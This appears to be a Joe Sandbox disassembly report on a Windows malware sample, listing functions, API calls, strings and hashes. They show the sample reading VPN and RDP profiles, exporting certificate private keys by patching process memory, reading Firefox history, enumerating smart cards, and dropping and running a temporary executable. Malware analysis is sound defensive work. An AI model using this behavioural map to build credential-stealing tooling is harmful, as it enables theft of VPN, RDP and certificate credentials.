Instruction Fuzzy Hash: 02E06DB2A00B45D2D7048F15E94008C7BB5EBD9FC8B548035CB4897324DF38DAA6C750

Function 00007FF6DFE279C4 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF6DFE274DE), ref: 00007FF6DFE279CD

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction ID: 39d4a84263e70d3a919c0606365b98aaed5c5ff81daf34f485248184cb9eb047
Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
Instruction Fuzzy Hash: 14D05E02C08683A3DA316B00A40A03E23A1BBD0309F814237C28D824B0FF6E96A99A05

Non-executed Functions

Function 00007FF6DFE2DC20 Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI ref: 00007FF6DFE2DDA2
PathFileExistsW.SHLWAPI ref: 00007FF6DFE2DDAC
PathQuoteSpacesW.SHLWAPI ref: 00007FF6DFE2DDBE
lstrcatW.KERNEL32 ref: 00007FF6DFE2DDD7
GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2DF64
PathAppendW.SHLWAPI ref: 00007FF6DFE2DF93
PathFileExistsW.SHLWAPI ref: 00007FF6DFE2DFA0
CreateFileW.KERNEL32 ref: 00007FF6DFE2DFD0
GetFileSize.KERNEL32 ref: 00007FF6DFE2DFE8
ReadFile.KERNEL32 ref: 00007FF6DFE2E010

Part of subcall function 00007FF6DFE2CF34: lstrlenA.KERNEL32 ref: 00007FF6DFE2CF47

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2E28D
PathAppendW.SHLWAPI ref: 00007FF6DFE2E2B6
PathFileExistsW.SHLWAPI ref: 00007FF6DFE2E2C3
CreateFileW.KERNEL32 ref: 00007FF6DFE2E2F3
GetFileSize.KERNEL32 ref: 00007FF6DFE2E30B

Part of subcall function 00007FF6DFE22588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6DFE2CD61), ref: 00007FF6DFE22595

ReadFile.KERNEL32 ref: 00007FF6DFE2E337

Strings

</DefaultHostName>, xrefs: 00007FF6DFE2E101
", "host": ", xrefs: 00007FF6DFE2E0BC
</DefaultGroup>, xrefs: 00007FF6DFE2E195
]},, xrefs: 00007FF6DFE2E24B
}},, xrefs: 00007FF6DFE2E1FB
Software\Microsoft\Terminal Server Client\Servers, xrefs: 00007FF6DFE2E22B
", "group": ", xrefs: 00007FF6DFE2E150
Software\Fortinet\FortiClient\Sslvpn\Tunnels, xrefs: 00007FF6DFE2DCD2
Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles, xrefs: 00007FF6DFE2DEF7
<DefaultHostName>, xrefs: 00007FF6DFE2E0DA
"user": ", xrefs: 00007FF6DFE2E032
Software\SonicWall\SSL-VPN NetExtender\Standalone, xrefs: 00007FF6DFE2DD71
</DefaultUser>, xrefs: 00007FF6DFE2E06D
<DefaultUser>, xrefs: 00007FF6DFE2E041
<DefaultGroup>, xrefs: 00007FF6DFE2E16E

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
API String ID: 2508640211-1951492331
Opcode ID: 1bb255e1f9bbd2e6d7fc8800ab426b3e9595c4d7a343f9b19d40a0c6e173b1ab
Instruction ID: 2ebb9c9aad63ff6ad70d3044aa11a0e0d83e1562e1dfaff52079fe947ae3b345
Opcode Fuzzy Hash: 1bb255e1f9bbd2e6d7fc8800ab426b3e9595c4d7a343f9b19d40a0c6e173b1ab
Instruction Fuzzy Hash: 9712A161A1964375EA30EB25D8552FD63A2BFC5784F804037EA0DC76AAEF3ED625C700

Function 00007FF6DFE23220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2325E
CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF6DFE2328D
CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE232BB

Part of subcall function 00007FF6DFE236F0: CryptExportKey.ADVAPI32 ref: 00007FF6DFE23744
Part of subcall function 00007FF6DFE236F0: CryptExportKey.ADVAPI32 ref: 00007FF6DFE2379E

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23336
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23380
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE233DC
CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE23404
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2341C
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2343F
CryptAcquireContextA.ADVAPI32 ref: 00007FF6DFE23459
CryptImportKey.ADVAPI32 ref: 00007FF6DFE2347E
OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE234B5
OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23505
QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23523
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE23532
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2355D
ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DFE22C48), ref: 00007FF6DFE2357C
WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6DFE2359F
NCryptExportKey.NCRYPT ref: 00007FF6DFE23605
CertOpenStore.CRYPT32 ref: 00007FF6DFE23667
CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF6DFE23682
CertSetCertificateContextProperty.CRYPT32 ref: 00007FF6DFE2369E
PFXExportCertStoreEx.CRYPT32 ref: 00007FF6DFE236BD
PFXExportCertStoreEx.CRYPT32 ref: 00007FF6DFE236DF

Strings

jlzm, xrefs: 00007FF6DFE232F2
CAPIPRIVATEBLOB, xrefs: 00007FF6DFE235AF, 00007FF6DFE235DE, 00007FF6DFE23622
,-1{, xrefs: 00007FF6DFE232FB
4(G, xrefs: 00007FF6DFE234C7
Microsoft Software Key Storage Provider, xrefs: 00007FF6DFE2360D

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
String ID: ,-1{$4(G$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$jlzm
API String ID: 2161712720-3700434115
Opcode ID: d750664ffbedd7f6a105bf9f1e719808195276d3ff6d54a1a0eed4277e7a8463
Instruction ID: 964724ae8b1a0b710b5bdb3a220976e3d1cb5a9625fde0e4dd492376ea6370ca
Opcode Fuzzy Hash: d750664ffbedd7f6a105bf9f1e719808195276d3ff6d54a1a0eed4277e7a8463
Instruction Fuzzy Hash: 7BE15E32B14642AAE720CFA1E8547ED77A1BB89788F40413ADE4D97B58DF3CD159CB40

Function 00007FF6DFE2213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

WinHttpOpen.WINHTTP ref: 00007FF6DFE2218D

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

WinHttpCrackUrl.WINHTTP ref: 00007FF6DFE221D8
WinHttpConnect.WINHTTP ref: 00007FF6DFE22213
WinHttpOpenRequest.WINHTTP ref: 00007FF6DFE222A8
WinHttpQueryOption.WINHTTP ref: 00007FF6DFE222E0
WinHttpSetOption.WINHTTP ref: 00007FF6DFE222FC
WinHttpSendRequest.WINHTTP ref: 00007FF6DFE2231D
WinHttpReceiveResponse.WINHTTP ref: 00007FF6DFE22330
WinHttpQueryDataAvailable.WINHTTP ref: 00007FF6DFE22359
WinHttpReadData.WINHTTP ref: 00007FF6DFE22381
WinHttpCloseHandle.WINHTTP ref: 00007FF6DFE224C7
WinHttpCloseHandle.WINHTTP ref: 00007FF6DFE224D0
WinHttpCloseHandle.WINHTTP ref: 00007FF6DFE224E0

Strings

=r:r, xrefs: 00007FF6DFE22241
>r!r, xrefs: 00007FF6DFE22265
>r!r, xrefs: 00007FF6DFE22440

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
String ID: =r:r$>r!r$>r!r
API String ID: 199669925-1865137870
Opcode ID: fe1e3c4305144440e10683195b4bbefb58b3cf12c5ee85f86fe1a2b260d32e69
Instruction ID: fbfce1d44526ccd2929d75d682047d67356196045bd0ba4c43a498a5db4adbf8
Opcode Fuzzy Hash: fe1e3c4305144440e10683195b4bbefb58b3cf12c5ee85f86fe1a2b260d32e69
Instruction Fuzzy Hash: D8A19172E18782A6EB20DF66A4441AD77A1FBC9B84F54403AEE4D83B59DF3DD415CB00

Function 00007FF6DFE2FB4C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65stringfileCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6DFE2FB7D
lstrcatW.KERNEL32 ref: 00007FF6DFE2FB8A
lstrcpyW.KERNEL32 ref: 00007FF6DFE2FB9B
lstrcatW.KERNEL32 ref: 00007FF6DFE2FBAF
FindFirstFileW.KERNEL32 ref: 00007FF6DFE2FBC3
lstrcatW.KERNEL32 ref: 00007FF6DFE2FBE1
lstrcatW.KERNEL32 ref: 00007FF6DFE2FBF2
FindClose.KERNEL32 ref: 00007FF6DFE2FBFB

Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF76
Part of subcall function 00007FF6DFE2FF50: lstrlenW.KERNEL32 ref: 00007FF6DFE2FF92
Part of subcall function 00007FF6DFE2FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6DFE2FFBB
Part of subcall function 00007FF6DFE2FF50: PathFileExistsA.SHLWAPI ref: 00007FF6DFE2FFC4
Part of subcall function 00007FF6DFE2FF50: OpenFile.KERNEL32 ref: 00007FF6DFE2FFDD
Part of subcall function 00007FF6DFE2FF50: GetFileSize.KERNEL32 ref: 00007FF6DFE2FFFD
Part of subcall function 00007FF6DFE2FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6DFE30034
Part of subcall function 00007FF6DFE2FF50: MapViewOfFile.KERNEL32 ref: 00007FF6DFE30055
Part of subcall function 00007FF6DFE2FF50: __memcpy.DELAYIMP ref: 00007FF6DFE30067
Part of subcall function 00007FF6DFE2FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6DFE30072
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE3007B
Part of subcall function 00007FF6DFE2FF50: CloseHandle.KERNEL32 ref: 00007FF6DFE30084

Part of subcall function 00007FF6DFE2F294: __memcpy.DELAYIMP ref: 00007FF6DFE2F2B2

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

Strings

APPDATA, xrefs: 00007FF6DFE2FB76
*.default-release, xrefs: 00007FF6DFE2FBA1
\places.sqlite, xrefs: 00007FF6DFE2FBE7

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
String ID: *.default-release$APPDATA$\places.sqlite
API String ID: 4154822446-3438982840
Opcode ID: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
Instruction ID: e051668cf6f95fa7201f7479a2cd0268ef976d8bec09956d286ed6e5a9893052
Opcode Fuzzy Hash: d1dd5c64499e9df49c2477c4a4298586ea46fd7df7aaf8f63ab7981e90ccc26b
Instruction Fuzzy Hash: 25315E22B18A87F1EB20DF24E8445EDA361FBC4795F804133DA5E875A8EF6DD619C740

Function 00007FF6DFE2B43C Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 310COMMON

Download Yara Rule

APIs

SCardGetStatusChangeW.WINSCARD ref: 00007FF6DFE2B553
SCardListCardsW.WINSCARD ref: 00007FF6DFE2B5FB
SCardFreeMemory.WINSCARD ref: 00007FF6DFE2B692
SCardListCardsW.WINSCARD ref: 00007FF6DFE2B7BA
SCardFreeMemory.WINSCARD ref: 00007FF6DFE2B84F

Strings

"_": "", xrefs: 00007FF6DFE2B46A
%02X, xrefs: 00007FF6DFE2B59F

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Card$CardsFreeListMemory$ChangeStatus
String ID: "_": ""$%02X
API String ID: 2879528921-1880646522
Opcode ID: 724603355995c16272e635407a9e37135ba2e644d7c58ba3da48bbd20d5b832f
Instruction ID: 05162c2bb3ef95029d7a1c378be725177c9b7afa15ba86eb4a0b27e5739bb570
Opcode Fuzzy Hash: 724603355995c16272e635407a9e37135ba2e644d7c58ba3da48bbd20d5b832f
Instruction Fuzzy Hash: 4FD14362F0960378EA24EB26A8511FD13A5AFC57C4B446037ED1FD76A6FE3EE5258300

Function 00007FF6DFE278EC Relevance: 6.1, APIs: 4, Instructions: 56libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF6DFE2797A
GetProcAddress.KERNEL32 ref: 00007FF6DFE27986
GetCurrentProcess.KERNEL32 ref: 00007FF6DFE27995
IsWow64Process.KERNEL32 ref: 00007FF6DFE279A3

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: Process$AddressCurrentLibraryLoadProcWow64
String ID:
API String ID: 4035193891-0
Opcode ID: fc502c4183f38da3a6c738e70bd59c56bb6cf1e44f81229a9ff746ea35346d61
Instruction ID: 357a824b62cd079139042ba2bc5f9063867afdadea94171c1e2e8060d17097a1
Opcode Fuzzy Hash: fc502c4183f38da3a6c738e70bd59c56bb6cf1e44f81229a9ff746ea35346d61
Instruction Fuzzy Hash: EA218462D1C7D3A7EB104F61A4052BEA790FBC9781F44523ADACD82B55EF6DC1648B40

Function 00007FF6DFE236F0 Relevance: 3.1, APIs: 2, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32 ref: 00007FF6DFE23744
CryptExportKey.ADVAPI32 ref: 00007FF6DFE2379E

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: CryptExport$HeapProcess
String ID:
API String ID: 532797600-0
Opcode ID: 831287bed50c6b68a2a3c77c2f92f5c7b860a71e9000b44808c3b900f1a82504
Instruction ID: d1607776534e7216a0bab23481a2b6dfd3bd046710e4bba0b15abf652f2409f9
Opcode Fuzzy Hash: 831287bed50c6b68a2a3c77c2f92f5c7b860a71e9000b44808c3b900f1a82504
Instruction Fuzzy Hash: A8219132A19643A6EB60CF15F50036E73E1EBC4B94F008231EA4D877A5EF3DD5518B00

Function 00007FF6DFE2A534 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16f4b17d73021f3b2e32145709c8bd66a9f2c3de1f9d79f3a69f6df6bdbbb5c
Instruction ID: 8f20edaf05d6f67177e577ea9958f7168fbb504ca32cad31526f19b1f42b997e
Opcode Fuzzy Hash: b16f4b17d73021f3b2e32145709c8bd66a9f2c3de1f9d79f3a69f6df6bdbbb5c
Instruction Fuzzy Hash: 25615C53A092D62AF7258E3A45512FE2B91EB56F88F040175DE898BB87EE2DD457C300

Function 00007FF6DFE2A78C Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404f8656230e13f4b390a5daf55f47e5d3011ab1fd20da05371be4dacabc9fd8
Instruction ID: 14dd5dade8fc8267e798c368dfbd5c3a164f6a6f4c267ac2f1ce85d17da1df1d
Opcode Fuzzy Hash: 404f8656230e13f4b390a5daf55f47e5d3011ab1fd20da05371be4dacabc9fd8
Instruction Fuzzy Hash: 38516847A043C26DEB268E3A84923EC2F51EB25B98F454036DF999BB47E93DD10BC310

Function 00007FF6DFE2FF50 Relevance: 18.1, APIs: 12, Instructions: 91filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 00007FF6DFE2FF76

Part of subcall function 00007FF6DFE22588: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6DFE2CD61), ref: 00007FF6DFE22595

lstrlenW.KERNEL32 ref: 00007FF6DFE2FF92
WideCharToMultiByte.KERNEL32 ref: 00007FF6DFE2FFBB
PathFileExistsA.SHLWAPI ref: 00007FF6DFE2FFC4
OpenFile.KERNEL32 ref: 00007FF6DFE2FFDD

Part of subcall function 00007FF6DFE225B4: GetProcessHeap.KERNEL32 ref: 00007FF6DFE225C1
Part of subcall function 00007FF6DFE225B4: RtlFreeHeap.NTDLL ref: 00007FF6DFE225CF

GetFileSize.KERNEL32 ref: 00007FF6DFE2FFFD

Part of subcall function 00007FF6DFE225DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6DFE21985,?,?,?,00007FF6DFE2155F), ref: 00007FF6DFE225E5

CreateFileMappingA.KERNEL32 ref: 00007FF6DFE30034
MapViewOfFile.KERNEL32 ref: 00007FF6DFE30055
__memcpy.DELAYIMP ref: 00007FF6DFE30067
UnmapViewOfFile.KERNEL32 ref: 00007FF6DFE30072
CloseHandle.KERNEL32 ref: 00007FF6DFE3007B
CloseHandle.KERNEL32 ref: 00007FF6DFE30084

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
String ID:
API String ID: 2161876737-0
Opcode ID: ce4658d3263bb0bad04798cbd4f1d375ce92f8820936d7a88265a75bc09cd35d
Instruction ID: 45be3f136e5fe061620479b526f0cc92ffdff3eabb3e99b649b4ba93acd57319
Opcode Fuzzy Hash: ce4658d3263bb0bad04798cbd4f1d375ce92f8820936d7a88265a75bc09cd35d
Instruction Fuzzy Hash: 8A319521A08A42A2E724DB26A85C77D63D1BBC9BE1F444236DE5DC77B4DF3CD4558B00

Function 00007FF6DFE21CBC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65filetimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32 ref: 00007FF6DFE21CF7
GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6DFE21D04
wsprintfA.USER32 ref: 00007FF6DFE21D1C
CreateFileA.KERNEL32 ref: 00007FF6DFE21D56
WriteFile.KERNEL32 ref: 00007FF6DFE21D88
CloseHandle.KERNEL32 ref: 00007FF6DFE21DA9
ShellExecuteA.SHELL32 ref: 00007FF6DFE21DCE

Strings

open, xrefs: 00007FF6DFE21DC2
%08X.exe, xrefs: 00007FF6DFE21D11

Memory Dump Source

Source File: 00000008.00000002.4490361866.00007FF6DFE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6DFE20000, based on PE: true

Associated: 00000008.00000002.4490305844.00007FF6DFE20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490411513.00007FF6DFE31000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490482335.00007FF6DFE34000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.4490572418.00007FF6DFE35000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6dfe20000_FDDB.jbxd

Similarity

API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
String ID: %08X.exe$open
API String ID: 2307396689-1771423410
Opcode ID: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction ID: c0ba955eb961fd93b39abee1a557fac7a7475307995e4579c20523733607986b
Opcode Fuzzy Hash: bba04421ac46b7f48ba8affa5e7cfb2839c56d732febee506ba2c17effb61a40
Instruction Fuzzy Hash: 5A317572A18A86B6E7308F61E8887ED6361FBC9789F404136DA4D86958DF7CC65DC700

Function 00007FF6DFE2F99C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 96stringCOMMON

